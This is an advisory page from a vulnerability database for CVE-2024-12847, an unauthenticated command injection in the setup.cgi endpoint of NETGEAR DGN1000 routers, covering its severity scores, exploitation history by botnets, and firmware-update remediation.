How to fix CVE-2024-12847?

Within 24 hours: Identify all affected systems and apply vendor patches immediately. Validate that input sanitization is in place for all user-controlled parameters.

Is Command Injection affected by CVE-2024-12847?

Organizations using NETGEAR DGN1000 before 1.1.00.48 face critical risk from CVE-2024-12847, a OS command injection vulnerability rated CVSS 9.8. Successful exploitation could allow attackers to execute arbitrary code or commands on affected systems, potentially leading to full system compromise.

CVE-2024-12847

CRITICAL

2025-01-10 [email protected]

9.8

CVSS 3.1

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Analysis Generated

Mar 28, 2026 - 18:02 vuln.today

PoC Detected

Dec 19, 2025 - 20:15 vuln.today

Public exploit code

CVE Published

Jan 10, 2025 - 20:15 nvd

CRITICAL 9.8

Description

NETGEAR DGN1000 before 1.1.00.48 is vulnerable to an authentication bypass vulnerability. A remote and unauthenticated attacker can execute arbitrary operating system commands as root by sending crafted HTTP requests to the setup.cgi endpoint. This vulnerability has been observed to be exploited in the wild since at least 2017 and specifically by the Shadowserver Foundation on 2025-02-06 UTC.

Analysis

NETGEAR DGN1000 routers with firmware before 1.1.00.48 contain an unauthenticated remote command execution vulnerability via the setup.cgi endpoint. The vulnerability has been exploited in the wild since at least 2017, notably by the Mirai-derived Reaper/IoTroop botnet for large-scale DDoS operations.

Technical Context

The setup.cgi endpoint on NETGEAR DGN1000 routers processes user input without authentication or sanitization, passing it directly to shell commands executed as root. The vulnerability is trivially exploitable via crafted HTTP requests. It has been weaponized in multiple botnet frameworks including Reaper/IoTroop and Mirai variants.

Affected Products

['NETGEAR DGN1000 firmware < 1.1.00.48']

Remediation

Update firmware to 1.1.00.48 or later. If the router is end-of-life, replace it immediately. Disable remote management access. Monitor network traffic for C2 communications from router IP addresses.

Priority Score

140

Low Medium High Critical

KEV: 0

EPSS: +71.3

CVSS: +49

POC: +20

CVE-2024-12847 vulnerability details – vuln.today

Back

CVE-2024-12847

CVSS Vector

Lifecycle Timeline

Tags

Description

Analysis

Technical Context

Affected Products

Remediation

Priority Score

Share

CVE-2024-12847

CVSS Vector

Lifecycle Timeline

Tags

Description

Analysis

Technical Context

Affected Products

Remediation

Priority Score

Share

External POC / Exploit Code